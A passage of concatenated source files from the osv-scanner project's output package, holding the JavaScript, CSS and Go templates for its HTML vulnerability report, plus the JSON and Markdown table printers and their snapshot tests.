================================================ FILE: internal/output/html/script.js ================================================ const selectedTypeFilterValue = new Set(["all"]); let selectedLayer = "all"; function toggleDetails(summaryID) { const detailsElementID = `${summaryID}-details`; const iconElementID = `${summaryID}-icon`; const detailsElement = document.getElementById(detailsElementID); const iconElement = document.getElementById(iconElementID); detailsElement.classList.toggle("hide-block"); iconElement.classList.toggle("expanded"); } function quickFilterByLayer(DiffID, layerCommand) { selectedLayer = DiffID; applyFilters(selectedTypeFilterValue, selectedLayer); const selectedDisplay = document.getElementById("layer-filter-selected"); selectedDisplay.textContent = layerCommand; } function showBaseImageLayer(imageID) { const detailElementID = `base-image-details-${imageID}`; const detailsElement = document.getElementById(detailElementID); const icon = document.querySelector( `#base-image-summary-${imageID} .material-icons` ); // Select the icon within the row const hidBlock = detailsElement.classList.toggle("hide-block"); icon.classList.toggle("expanded", !hidBlock); } function showPackageDetails(detailsId) { const detailsElement = document.getElementById( `table-tr-${detailsId}-details` ); const icon = document.querySelector(`#table-tr-${detailsId} .material-icons`); // Select the icon within the row const hidBlock = detailsElement.classList.toggle("hide-block"); icon.classList.toggle("expanded", !hidBlock); } function openVulnInNewTab(inputString) { const osvURL = `https://osv.dev/${inputString}`; const tabs = document.getElementById("tabs"); const tabSwitches = document.getElementById("tab-switch"); const existingTab = document.getElementById(inputString); if (existingTab) { openTab(inputString); return; } // Create the new tab div. const newTab = document.createElement("div"); newTab.id = inputString; // Set the ID to the input string newTab.className = "tab osv-tab"; // Set the class name // Create a spinner indicating loading status const spinner = document.createElement("div"); spinner.className = "iframe-spinner"; // Create the iframe element. const iframe = document.createElement("iframe"); iframe.src = osvURL; iframe.onload = () => { newTab.removeChild(spinner); }; // Create a new tab button const newTabButton = document.createElement("div"); newTabButton.id = `${inputString}-button`; newTabButton.className = "tab-switch-button"; newTabButton.onclick = () => { openTab(inputString); }; // Add

and elements to the button const newTabTextContainer = document.createElement("div"); newTabTextContainer.className = "tab-button-text-container"; const newTabText = document.createElement("p"); newTabText.textContent = inputString; newTabTextContainer.appendChild(newTabText); const newTabButtonBorder = document.createElement("div"); newTabButtonBorder.className = "tab-switch-button-border"; newTabTextContainer.appendChild(newTabButtonBorder); newTabButton.appendChild(newTabTextContainer); const closeIcon = document.createElement("span"); closeIcon.className = "material-icons"; closeIcon.textContent = "close"; // Add the onclick function to the close icon closeIcon.onclick = event => { event.stopPropagation(); // Prevent the click from opening the tab closeVulnTab(inputString); }; newTabButton.appendChild(closeIcon); // Add the iframe to the new tab div. newTab.appendChild(spinner); newTab.appendChild(iframe); // Add the iframe to the container. tabs.appendChild(newTab); tabSwitches.appendChild(newTabButton); openTab(newTab.id); } function closeVulnTab(inputString) { const tabToRemove = document.getElementById(inputString); const buttonToRemove = document.getElementById(`${inputString}-button`); const tabs = document.getElementById("tabs"); const tabSwitches = document.getElementById("tab-switch"); if (tabToRemove && buttonToRemove) { const nextTabButton = buttonToRemove.nextElementSibling || buttonToRemove.previousElementSibling; tabs.removeChild(tabToRemove); tabSwitches.removeChild(buttonToRemove); if (nextTabButton) { const nextTabId = nextTabButton.id.replace("-button", ""); openTab(nextTabId); } } } function openTab(activeTabId) { const tabs = document.getElementsByClassName("tab"); const tabButtons = document.getElementsByClassName("tab-switch-button"); for (let i = 0; i < tabs.length; i += 1) { tabs[i].classList.toggle("hide-block", tabs[i].id !== activeTabId); tabButtons[i].classList.toggle( "tab-switch-button-selected", tabs[i].id === activeTabId ); } } function hideAllFilterOptions() { const containers = document.getElementsByClassName("filter-option-container"); for (const container of containers) { container.classList.add("hide-block"); } } function toggleFilter(input) { const targetID = `${input}-filter-option-container`; const optionContainer = document.getElementById(targetID); const containers = document.getElementsByClassName("filter-option-container"); for (const loopContainer of containers) { if (loopContainer.id === targetID) { optionContainer.classList.toggle("hide-block"); } else { loopContainer.classList.add("hide-block"); } } } function showAndHideParentSections() { const ecosystemContainers = document.querySelectorAll(".ecosystem-container"); ecosystemContainers.forEach(ecosystemContainer => { const sourceContainers = ecosystemContainer.querySelectorAll(".source-container"); let ecosystemHasVisibleSources = false; sourceContainers.forEach(sourceContainer => { const packageRows = sourceContainer.querySelectorAll(".package-tr"); let sourceHasVisibleRows = false; packageRows.forEach(packageRow => { const packageDetails = document.getElementById( `${packageRow.id}-details` ); const vulnRows = packageDetails.querySelectorAll(".vuln-tr"); if ( Array.from(vulnRows).some( row => !row.classList.contains("hide-block") ) ) { sourceHasVisibleRows = true; packageRow.classList.remove("hide-block"); return; } packageRow.classList.add("hide-block"); packageDetails.classList.add("hide-block"); const icon = document.querySelector( `#${packageRow.id} .material-icons` ); icon.classList.remove("expanded"); // Rotate back to 0 degrees }); sourceContainer.classList.toggle("hide-block", !sourceHasVisibleRows); if (sourceHasVisibleRows) { ecosystemHasVisibleSources = true; } }); ecosystemContainer.classList.toggle( "hide-block", !ecosystemHasVisibleSources ); }); } function showAllVulns() { const vulnRows = document.getElementsByClassName("vuln-tr"); for (const row of vulnRows) { const isUncalled = row.classList.contains("uncalled-tr"); row.classList.toggle("hide-block", isUncalled); } showAndHideParentSections(); } function applyFilters(selectedTypeFilterValue, selectedLayerFilterValue) { // Show all vulnerabilities and then hide those that do not match the filter requirements. showAllVulns(); applyTypeFilter(selectedTypeFilterValue); applyLayerFilter(selectedLayerFilterValue); showAndHideParentSections(); } function applyTypeFilter(selectedValue) { updateTypeFilterText(); const selectedAll = selectedValue.has("all"); const selectedProject = selectedAll || selectedValue.has("project"); const selectedOS = selectedAll || selectedValue.has("os"); const selectedUncalled = selectedValue.has("uncalled"); const ecosystemElements = document.querySelectorAll(".ecosystem-container"); ecosystemElements.forEach(ecosystemElement => { const vulnElements = ecosystemElement.querySelectorAll(".vuln-tr"); vulnElements.forEach(vuln => { if (vuln.classList.contains("uncalled-tr")) { vuln.classList.toggle("hide-block", !selectedUncalled); } if ( (ecosystemElement.classList.contains("os-type") && !selectedOS) || (ecosystemElement.classList.contains("project-type") && !selectedProject) ) { vuln.classList.add("hide-block"); } }); }); } function applyLayerFilter(selectedLayerID) { const tableRows = document.querySelectorAll("tr.has-layer-info"); tableRows.forEach(row => { const rowLayerID = row.getAttribute("data-layer"); if (selectedLayerID !== "all" && rowLayerID !== selectedLayerID) { const packageDetails = document.getElementById(`${row.id}-details`); const vulnElements = packageDetails.querySelectorAll(".vuln-tr"); vulnElements.forEach(vuln => { vuln.classList.add("hide-block"); }); } }); } function updateTypeFilterText() { const typeSelected = document.getElementById("type-filter-selected"); const selectedVulnCount = document.getElementById("selected-count"); const allTypeCheckbox = document.getElementById("all-type-checkbox"); const osTypeCheckbox = document.getElementById("os-type-checkbox"); const projectTypeCheckbox = document.getElementById("project-type-checkbox"); const uncalledTypeCheckbox = document.getElementById( "uncalled-type-checkbox" ); let selectedText = ""; let selectedCount = 0; if (projectTypeCheckbox && projectTypeCheckbox.checked) { selectedText += `${selectedText ? ", " : ""}Project`; const projectTypeVulnCount = projectTypeCheckbox.getAttribute( "data-type-project-count" ); selectedCount += parseInt(projectTypeVulnCount, 10); } if (osTypeCheckbox && osTypeCheckbox.checked) { selectedText += `${selectedText ? ", " : ""}OS`; const osTypeVulnCount = osTypeCheckbox.getAttribute("data-type-os-count"); selectedCount += parseInt(osTypeVulnCount, 10); } if (uncalledTypeCheckbox && uncalledTypeCheckbox.checked) { selectedText += `${selectedText ? ", " : ""}Unimportant`; const uncalledTypeVulnCount = uncalledTypeCheckbox.getAttribute( "data-type-uncalled-count" ); selectedCount += parseInt(uncalledTypeVulnCount, 10); } if ( allTypeCheckbox && allTypeCheckbox.checked && uncalledTypeCheckbox && !uncalledTypeCheckbox.checked ) { selectedText = "Default"; } typeSelected.textContent = selectedText; selectedVulnCount.textContent = selectedCount; } function resetFilterText() { const layerSelected = document.getElementById("layer-filter-selected"); const allLayerCheckedBox = document.getElementById("all-layer-checkbox"); if (layerSelected) { layerSelected.textContent = `All layers (${allLayerCheckedBox.getAttribute("data-layer-all-count")})`; } const typeSelected = document.getElementById("type-filter-selected"); const selectedVulnCount = document.getElementById("selected-count"); const allTypeCheckedBox = document.getElementById("all-type-checkbox"); const uncalledTypeCheckBox = document.getElementById( "uncalled-type-checkbox" ); if (allTypeCheckedBox) { typeSelected.textContent = "Default"; selectedVulnCount.textContent = allTypeCheckedBox.getAttribute( "data-type-all-count" ); if (allLayerCheckedBox) { allLayerCheckedBox.checked = true; } uncalledTypeCheckBox.checked = false; } else { const projectTypeCheckedBox = document.getElementById( "project-type-checkbox" ); projectTypeCheckedBox.checked = true; typeSelected.textContent = "Default"; selectedVulnCount.textContent = projectTypeCheckedBox.getAttribute( "data-type-project-count" ); uncalledTypeCheckBox.checked = false; } } function resetSearchText() { const vulnSearchInput = document.getElementById("vuln-search"); if (vulnSearchInput.value !== "") { vulnSearchInput.value = ""; showAllVulns(); } } function resetTypeCheckbox() { const allTypeCheckbox = document.getElementById("all-type-checkbox"); const osTypeCheckbox = document.getElementById("os-type-checkbox"); const projectTypeCheckbox = document.getElementById("project-type-checkbox"); const uncalledTypeCheckbox = document.getElementById( "uncalled-type-checkbox" ); if (allTypeCheckbox) { allTypeCheckbox.checked = true; projectTypeCheckbox.checked = true; if (osTypeCheckbox) { osTypeCheckbox.checked = true; } uncalledTypeCheckbox.checked = false; } } document.addEventListener("DOMContentLoaded", () => { resetFilterText(); showAndHideParentSections(); // Implement filter for vulnerability types const typeFilterOptions = document.getElementById( "type-filter-option-container" ); typeFilterOptions.addEventListener("change", event => { resetSearchText(); const changedElement = event.target; const allTypesCheckbox = document.getElementById("all-type-checkbox"); const projectCheckbox = document.getElementById("project-type-checkbox"); // Project vulnerabilities const osCheckbox = document.getElementById("os-type-checkbox"); // OS vulnerabilities const uncalledCheckbox = document.getElementById("uncalled-type-checkbox"); // OS vulnerabilities selectedTypeFilterValue.clear(); if (allTypesCheckbox !== null) { if (changedElement === allTypesCheckbox) { osCheckbox.checked = allTypesCheckbox.checked; projectCheckbox.checked = allTypesCheckbox.checked; if (allTypesCheckbox.checked === true) { selectedTypeFilterValue.add("all"); } } if (osCheckbox.checked === false || projectCheckbox.checked === false) { allTypesCheckbox.checked = false; } if (osCheckbox.checked) { selectedTypeFilterValue.add("os"); } } if (projectCheckbox.checked) { selectedTypeFilterValue.add("project"); } if (uncalledCheckbox.checked) { selectedTypeFilterValue.add("uncalled"); } applyFilters(selectedTypeFilterValue, selectedLayer); }); // Implement layer filter const layerFilterOptionsContainer = document.getElementById( "layer-filter-option-container" ); if (layerFilterOptionsContainer) { layerFilterOptionsContainer.addEventListener("click", event => { const clickedOption = event.target.closest(".layer-filter-option"); if (clickedOption) { resetSearchText(); selectedLayer = clickedOption.getAttribute("data-layer-hash"); const selectedDisplay = document.getElementById( "layer-filter-selected" ); const layerCommand = clickedOption.querySelector("p:first-child"); selectedDisplay.textContent = layerCommand.textContent; hideAllFilterOptions(); applyFilters(selectedTypeFilterValue, selectedLayer); } }); } // Hide filter options when clicking other parts const filterSections = document.querySelectorAll("div.filter"); document.addEventListener("click", event => { if (![...filterSections].some(c => c.contains(event.target))) { hideAllFilterOptions(); } }); // Search bar const vulnSearchInput = document.getElementById("vuln-search"); vulnSearchInput.addEventListener("keyup", () => { resetFilterText(); selectedTypeFilterValue.clear(); selectedTypeFilterValue.add("all"); selectedLayer = "all"; resetTypeCheckbox(); const searchTerm = vulnSearchInput.value.trim().toLowerCase(); const vulnRows = document.querySelectorAll("[data-vuln-id]"); if (searchTerm === "") { showAllVulns(); return; } vulnRows.forEach(row => { const vulnID = row.getAttribute("data-vuln-id").toLowerCase(); row.classList.toggle("hide-block", !vulnID.includes(searchTerm)); }); showAndHideParentSections(); }); // Implement tooltips document.querySelectorAll(".tooltip").forEach(elem => { elem.addEventListener("mouseover", () => { const rect = elem.getBoundingClientRect(); const tooltipElem = elem.querySelector(".tooltiptext"); tooltipElem.style.left = `${rect.left}px`; tooltipElem.style.top = `${rect.top}px`; }); }); showAllVulns(); }); ================================================ FILE: internal/output/html/severity_summary_template.gohtml ================================================

{{ .Critical }}

Critical

{{ .High }}

High

{{ .Medium }}

Medium

{{ .Low }}

Low

{{ .Unknown }}

Unknown
================================================ FILE: internal/output/html/style.css ================================================ body { margin: 0; padding: 0; background: #292929; color: #fff; overflow-y: scroll; font-family: "Overpass Mono", monospace; font-size: 12pt; font-weight: 100; min-width: fit-content; } a { color: inherit; } .container { max-width: 1400px; margin: 50px auto; padding: 20px; border-radius: 4px; box-shadow: 0 0 5px rgba(255, 255, 255, 0.15); min-height: 90vh; } h2 { margin-top: 50px; font-size: 15pt; } h3 { font-size: 12pt; margin-top: 30px; } h1, h2, h3 { font-family: "Overpass Mono", monospace; font-weight: normal; } .ecosystem { margin-top: 20px; } header { display: flex; margin-bottom: 50px; justify-content: space-between; } #header-left { display: flex; align-items: center; } .logo { height: 20px; } #header-left .vl { border-left: 2px solid #fff; height: 25px; margin-left: 20px; margin-right: 20px; } #header-left h1 { font-size: 23px; } #header-right { display: flex; align-items: center; } #header-right ::after { display: inline-block; content: " "; background-image: url(https://osv.dev/static/img/external-link.svg); width: 16px; height: 16px; margin-left: 3px; vertical-align: middle; } .material-icons { vertical-align: middle; transform: rotate(0deg); transition: transform 0.2s ease; user-select: none; } .material-icons.expanded { transform: rotate(90deg); } .vuln-table { width: 100%; text-align: left; margin-bottom: 40px; margin-top: 10px; color: rgba(255, 255, 255, 0.87); border-spacing: 0; } .vuln-table th { border-bottom: 1px solid rgba(255, 255, 255, 0.33); padding: 16px; } .table-tr { line-height: 30px; } .table-tr td { word-break: break-word; width: 200px; padding: 16px; } .table-tr:hover { background-color: rgba(255, 255, 255, 0.04); } .table-tr-details > td { border-bottom: 1px solid rgba(255, 255, 255, 0.2); } .vuln-tr { display: table-row; } .vuln-id { color: #d9534f; } .package-details { text-align: left; padding: 20px 50px 30px 50px; display: block; max-height: 800px; overflow: auto; background: /* Cover TOP */ linear-gradient(rgb(41, 41, 41) 30%, rgba(41, 41, 41, 0)) center top, /* Cover BOTTOM */ linear-gradient(rgba(41, 41, 41, 0), rgb(41, 41, 41) 70%) center bottom, /* Shadow TOP */ linear-gradient(rgba(0, 0, 0, 0.2), rgba(0, 0, 0, 0)) center top, /* Shadow BOTTOM */ linear-gradient(rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.2)) center bottom; background-repeat: no-repeat; background-size: 100% 40px, 100% 40px, 100% 20px, 100% 20px; background-attachment: local, local, scroll, scroll; } .package-details p { margin-bottom: 10px; margin-top: 10px; } .table-tr:hover .open-in-tab-tag { display: inline; } .open-in-tab-tag { display: none; border: 1px solid rgba(255, 255, 255, 0.12); padding: 5px; border-radius: 4px; width: fit-content; } .open-in-tab-cell { width: 90px !important; cursor: pointer; } .severity-cell { width: 60px !important; user-select: none; } .fixable-tag { border-radius: 4px; max-width: 250px; width: fit-content; padding: 0 5px; white-space: nowrap; overflow: hidden; text-align: center; user-select: none; } .has-fix { white-space: break-spaces; background-color: #6a6a6a; } .no-fix { background-color: #252525; border: 1px solid #3c4043; } .hide-block + .table-tr-details { /* If details is after a hidden block, also hide details */ display: none; } .uncalled-text { color: #808080; } #vuln-tab { display: block; margin-top: 30px; } #tab-switch { text-align: left; border-bottom: 1px solid #6c6c6c; padding-left: 20px; display: flex; margin-bottom: 50px; } .tab-switch-button { width: 180px; outline: 0; cursor: pointer; background-color: transparent; text-align: center; display: flex; } .tab-button-text-container { flex-direction: column; align-items: center; } .tab-button-text-container p { width: 160px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; border-bottom: 2px solid transparent; color: #5f6368; } .tab-switch-button span { cursor: pointer; font-size: 16px; display: none; } .tab-switch-button-border { width: 85%; height: 3px; background-color: transparent; margin: auto; } .tab-button-text-container:hover p { color: #fff; } .tab-switch-button-selected:hover span { display: block; } .tab-switch-button-selected .tab-switch-button-border { background-color: #eee; border-top-left-radius: 5px; border-top-right-radius: 5px; } .tab-switch-button-selected p { color: #fff; } .osv-tab { position: relative; } .osv-tab iframe { width: 100%; min-height: 1000px; border: none; } .iframe-spinner { position: absolute; inset: 0; margin: auto; width: 48px; height: 48px; border: 5px solid #fff; border-bottom-color: transparent; border-radius: 50%; display: inline-block; box-sizing: border-box; animation: rotation 1s linear infinite; } .package-tr { cursor: pointer; } .icon-td { width: 10px !important; } #filter-section { display: flex; width: 60%; } .filter-container { margin-right: 20px; max-width: 600px; } .filter { margin-top: 10px; max-width: 600px; min-width: 250px; background-color: transparent; border-radius: 8px; overflow: hidden; color: #fff; border: 1px solid #ddd; display: flex; justify-content: space-between; padding: 0 20px; } #layer-filter { width: 400px !important; } .filter-selected { white-space: nowrap; overflow: hidden; } .filter-option-container { border: 1px solid #ddd; border-radius: 8px; position: absolute; background-color: #292929; min-width: 200px; max-width: 1400px; box-shadow: 0px 8px 16px 0px rgba(0, 0, 0, 0.2); z-index: 1; display: block; } .filter-option { border-bottom: 1px dotted #ddd; padding: 15px 20px; white-space: nowrap; cursor: pointer; display: block; } .filter-option input, .filter-option label { cursor: pointer; } #layer-filter-option-container { width: 1400px; } .layer-filter-option { display: flex; justify-content: space-between; } .filter-option:hover { background-color: rgba(255, 255, 255, 0.04); } .filter-icon i { position: relative; top: 25%; } #summary-section { display: flex; justify-content: space-between; width: 100%; } #severity-section { overflow: hidden; } .severity-long { text-align: center; min-width: 100px; overflow: hidden; white-space: nowrap; user-select: none; } .severity-long p { font-size: 10pt; padding: 5px 5px; border-radius: 4px; margin-right: 3px; } .critical { background-color: #ad0300; } .high { background-color: #ffa500; } .medium { background-color: #ffd700; color: #292929; } .low { background-color: #53aa33; color: #292929; } .unknown { background-color: #80868b; } .severity-count-summary { display: flex; } .severity-short { width: 40px; user-select: none; } .severity-short p { text-align: center; } .severity-short-first p { border-top-left-radius: 4px; border-bottom-left-radius: 4px; } .severity-short-last p { border-top-right-radius: 4px; border-bottom-right-radius: 4px; } .severity-cell .severity-short p { border-radius: 4px; } /* CSS for the search box */ .search-box { display: flex; align-items: center; width: 100%; border: 1px solid #fff; background-color: transparent; border-radius: 8px; margin-top: 30px; } .search-box input[type="text"] { flex: 1 0 auto; padding: 15px 10px; border: none; background-color: transparent; color: #fff; font-size: 12pt; } .search-box input[type="text"]:focus { outline: none; } .search-icon { height: fit-content; padding: 13px; } .package-detail-title { color: #9aa0a6; } .layer-command-container { display: flex; } .inner-table { width: 100%; border: 0.5px solid rgba(255, 255, 255, 0.12); border-spacing: 0px; border-radius: 4px; } .inner-table th { border-bottom: 0.5px solid rgba(255, 255, 255, 0.12); } .inner-table td { border-bottom: 0.5px solid rgba(255, 255, 255, 0.12); } .expand-icon i.rotated { transform: rotate(90deg); } .tooltip { position: relative; display: inline-block; text-decoration: underline; text-decoration-style: dotted; text-underline-offset: 3px; } .tooltip.no-underline { text-decoration: none; } .tooltip .tooltiptext { visibility: hidden; background-color: black; color: #fff; white-space: normal; text-align: left; line-height: 1.5; max-width: 300px; width: max-content; padding: 10px; border-radius: 4px; /* Position the tooltip */ position: fixed; transform: translateY(-100%); z-index: 999; } .tooltip .tooltiptext.layer-tooltiptext { white-space: normal; margin-left: 0; width: 1000px; max-width: 1000px; max-height: 200px; overflow-x: hidden; overflow-y: auto; } .tooltip:hover .tooltiptext { visibility: visible; } .severity-count-summary .tooltip { text-decoration: none; } .flex-box { display: flex; } /* new added */ .base-icon .tooltiptext { margin-left: 0px; background-color: #292929; } div.title { visibility: hidden; } .summary-section { margin-top: 30px; border: 1px solid #fff; border-radius: 8px; padding: 10px 20px; max-height: 400px; overflow-y: visible; overflow-x: hidden; } #base-image-table { width: 100%; } #base-image-table th { text-align: left; height: 30px; } .layer-entry { display: flex; justify-content: space-between; padding: 0 10px; border-bottom: 1px dotted #666666; } .base-image-summary { cursor: pointer; } .base-image-details { display: block; margin-bottom: 20px; } .base-image-title { width: 150px; color: #9aa0a6; height: 20px; } .layer-command { max-width: 1000px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; } .clickable { cursor: pointer; } .clickable-layer:hover { background-color: rgba(255, 255, 255, 0.04); } .source-path { border: 1px #888 solid; border-radius: 4px; padding: 5px; background-color: rgba(0, 0, 0, 0.2); line-height: 2; } .hide-block { display: none !important; } #license-summary-details { margin-left: 30px; } #deprecated-packages-details { margin-left: 30px; } @keyframes rotation { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } ================================================ FILE: internal/output/html/vuln_table_entry_template.gohtml ================================================ {{ $index := uniqueID }} {{ $element := .Element }} {{ if eq (len $element.GroupIDs) 1 }}
{{ $element.ID }}
{{ else }}
{{ $element.ID }}
Group IDs:
{{ range $rowIndex, $alias := $element.GroupIDs }} {{ $alias }}
{{ end }}
{{ end }} {{ if eq (len $element.Aliases) 1 }} {{ index $element.Aliases 0 }} {{ else if gt (len $element.Aliases) 1}}
{{ index $element.Aliases 0}}, ... {{ range $rowIndex, $alias := $element.Aliases }} {{ $alias }}
{{ end }}
{{ else }} No Aliases {{ end }}

{{$element.FixedVersion }}

{{ $element.SeverityScore }}

Open in tab

================================================ FILE: internal/output/html/vuln_table_template.gohtml ================================================ {{ range $rowIndex, $element := .RegularVulns }} {{$args := buildVulnTableEntryArgument $element false}} {{template "vuln_table_entry_template.gohtml" $args}} {{ end }} {{ range $rowIndex, $element := .HiddenVulns }} {{ $index := uniqueID }} {{$args := buildVulnTableEntryArgument $element true}} {{template "vuln_table_entry_template.gohtml" $args}} {{ end }}
Vulnerability ID Aliases / Upstream Fixed version Severity
================================================ FILE: internal/output/html.go ================================================ package output import ( "embed" "html/template" "io" "strings" "github.com/google/osv-scanner/v2/internal/utility/results" "github.com/google/osv-scanner/v2/internal/utility/severity" "github.com/google/osv-scanner/v2/pkg/models" ) // TemplateDir is the directory containing the HTML templates const TemplateDir = "html/*" //go:embed html/* var templates embed.FS // uniqueIndex creates a function that generates unique indices for HTML elements. // It takes an integer pointer as input and increments the integer's value each time the // returned function is called. This ensures that each call to the returned function // produces a different index, even when called concurrently from multiple goroutines. func uniqueIndex(index *int) func() int { return func() int { *index += 1 return *index } } func formatSlice(slice []string) string { return strings.Join(slice, ", ") } func formatLicense(slice []models.License) string { stringSlice := make([]string, len(slice)) for i, license := range slice { stringSlice[i] = string(license) } return formatSlice(stringSlice) } func formatRating(rating severity.Rating) string { return strings.ToLower(string(rating)) } type VulnTableEntryArgument struct { Element VulnResult IsHidden bool } func buildVulnTableEntryArgument(element VulnResult, isHidden bool) VulnTableEntryArgument { return VulnTableEntryArgument{ IsHidden: isHidden, Element: element, } } func hasOSResult(ecosystems []EcosystemResult) bool { for _, ecosystem := range ecosystems { if ecosystem.IsOS { return true } } return false } func PrintHTMLResults(vulnResult *models.VulnerabilityResults, outputWriter io.Writer) error { // htmlResult := BuildHTMLResults(vulnResult) result := BuildResults(vulnResult) vulnIndex := 0 // Parse embedded templates funcMap := template.FuncMap{ "uniqueID": uniqueIndex(&vulnIndex), "join": strings.Join, "formatRating": formatRating, "add": func(a, b int) int { return a + b }, "getFilteredVulnReasons": getFilteredVulnReasons, "getBaseImageName": getBaseImageName, "formatSlice": formatSlice, "formatLayerCommand": formatLayerCommand, "buildVulnTableEntryArgument": buildVulnTableEntryArgument, "formatLicense": formatLicense, "hasOSResult": hasOSResult, "GetShortCommit": results.GetShortCommit, "isOSResult": isOSResult, } tmpl := template.Must(template.New("").Funcs(funcMap).ParseFS(templates, TemplateDir)) // Execute template return tmpl.ExecuteTemplate(outputWriter, "report_template.gohtml", result) } ================================================ FILE: internal/output/html_test.go ================================================ package output_test import ( "bytes" "testing" "github.com/google/osv-scanner/v2/internal/output" ) func TestPrintHTMLResults_WithVulnerabilities(t *testing.T) { t.Parallel() testOutputWithVulnerabilities(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} err := output.PrintHTMLResults(args.vulnResult, outputWriter) if err != nil { t.Errorf("Error writing HTML output: %s", err) } }) } func TestPrintHTMLResults_WithLicenseViolations(t *testing.T) { t.Parallel() testOutputWithLicenseViolations(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} err := output.PrintHTMLResults(args.vulnResult, outputWriter) if err != nil { t.Errorf("Error writing HTML output: %s", err) } }) } func TestPrintHTMLResults_WithMixedIssues(t *testing.T) { t.Parallel() testOutputWithMixedIssues(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} err := output.PrintHTMLResults(args.vulnResult, outputWriter) if err != nil { t.Errorf("Error writing HTML output: %s", err) } }) } ================================================ FILE: internal/output/machinejson.go ================================================ package output import ( "encoding/json" "io" "github.com/google/osv-scanner/v2/pkg/models" ) // PrintJSONResults writes results to the provided writer in JSON format func PrintJSONResults(vulnResult *models.VulnerabilityResults, outputWriter io.Writer) error { encoder := json.NewEncoder(outputWriter) encoder.SetIndent("", " ") return encoder.Encode(vulnResult) } ================================================ FILE: internal/output/machinejson_test.go ================================================ package output_test import ( "bytes" "testing" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestPrintJSONResults_WithVulnerabilities(t *testing.T) { t.Parallel() testOutputWithVulnerabilities(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} err := output.PrintJSONResults(args.vulnResult, outputWriter) if err != nil { t.Errorf("Error writing JSON output: %s", err) } testutility.NewSnapshot().MatchText(t, outputWriter.String()) }) } func TestPrintJSONResults_WithLicenseViolations(t *testing.T) { t.Parallel() testOutputWithLicenseViolations(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} err := output.PrintJSONResults(args.vulnResult, outputWriter) if err != nil { t.Errorf("Error writing JSON output: %s", err) } testutility.NewSnapshot().MatchText(t, outputWriter.String()) }) } func TestPrintJSONResults_WithMixedIssues(t *testing.T) { t.Parallel() testOutputWithMixedIssues(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} err := output.PrintJSONResults(args.vulnResult, outputWriter) if err != nil { t.Errorf("Error writing JSON output: %s", err) } testutility.NewSnapshot().MatchText(t, outputWriter.String()) }) } ================================================ FILE: internal/output/markdowntable.go ================================================ package output import ( "fmt" "io" "github.com/google/osv-scanner/v2/pkg/models" "github.com/jedib0t/go-pretty/v6/table" "github.com/jedib0t/go-pretty/v6/text" ) // PrintMarkdownTableResults prints the osv scan results into a human friendly Markdown table. // The Markdown table uses the same format and columns as the standard table output. func PrintMarkdownTableResults(vulnResult *models.VulnerabilityResults, outputWriter io.Writer, showAllVulns bool) { text.DisableColors() outputResult := BuildResults(vulnResult) // Add a newline to separate results from logs. fmt.Fprintln(outputWriter) if outputResult.IsContainerScanning { fmt.Fprintf(outputWriter, "%s:\n", GetContainerScanningHeader(outputResult)) } printSummary(outputResult, outputWriter) outputTable := table.NewWriter() outputTable.SetOutputMirror(outputWriter) outputTable = tableBuilder(outputTable, outputResult, showAllVulns) if outputTable.Length() != 0 { outputTable.RenderMarkdown() } licenseConfig := vulnResult.ExperimentalAnalysisConfig.Licenses if licenseConfig.Summary { outputLicenseSummaryTable := table.NewWriter() outputLicenseSummaryTable.SetOutputMirror(outputWriter) outputLicenseSummaryTable = licenseSummaryTableBuilder(outputLicenseSummaryTable, vulnResult) if outputLicenseSummaryTable.Length() != 0 { outputLicenseSummaryTable.RenderMarkdown() } } if len(licenseConfig.Allowlist) > 0 { outputLicenseViolationsTable := table.NewWriter() outputLicenseViolationsTable.SetOutputMirror(outputWriter) outputLicenseViolationsTable = licenseViolationsTableBuilder(outputLicenseViolationsTable, vulnResult) if outputLicenseViolationsTable.Length() > 0 { outputLicenseViolationsTable.RenderMarkdown() } } if outputResult.PkgDeprecatedCount > 0 { outputDeprecatedPackagesTable := table.NewWriter() outputDeprecatedPackagesTable.SetOutputMirror(outputWriter) outputDeprecatedPackagesTable = deprecatedPackagesTableBuilder(outputDeprecatedPackagesTable, vulnResult) printPkgDeprecatedSummary(outputResult, outputWriter) outputDeprecatedPackagesTable.RenderMarkdown() } } ================================================ FILE: internal/output/markdowntable_test.go ================================================ package output_test import ( "bytes" "testing" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestPrintMarkdownTableResults_WithVulnerabilities(t *testing.T) { t.Parallel() testOutputWithVulnerabilities(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} output.PrintMarkdownTableResults(args.vulnResult, outputWriter, true) testutility.NewSnapshot().MatchText(t, outputWriter.String()) }) } func TestPrintMarkdownTableResults_WithLicenseViolations(t *testing.T) { t.Parallel() testOutputWithLicenseViolations(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} output.PrintMarkdownTableResults(args.vulnResult, outputWriter, false) testutility.NewSnapshot().MatchText(t, outputWriter.String()) }) } func TestPrintMarkdownTableResults_WithMixedIssues(t *testing.T) { t.Parallel() testOutputWithMixedIssues(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} output.PrintMarkdownTableResults(args.vulnResult, outputWriter, false) testutility.NewSnapshot().MatchText(t, outputWriter.String()) }) } ================================================ FILE: internal/output/output_result.go ================================================ package output import ( "cmp" "encoding/json" "fmt" "io" "slices" "sort" "strings" "github.com/google/osv-scalibr/inventory/vex" "github.com/google/osv-scalibr/semantic" "github.com/google/osv-scanner/v2/internal/cachedregexp" "github.com/google/osv-scanner/v2/internal/identifiers" "github.com/google/osv-scanner/v2/internal/utility/results" "github.com/google/osv-scanner/v2/internal/utility/severity" "github.com/google/osv-scanner/v2/pkg/models" "github.com/jedib0t/go-pretty/v6/text" "github.com/ossf/osv-schema/bindings/go/osvschema" ) // Result 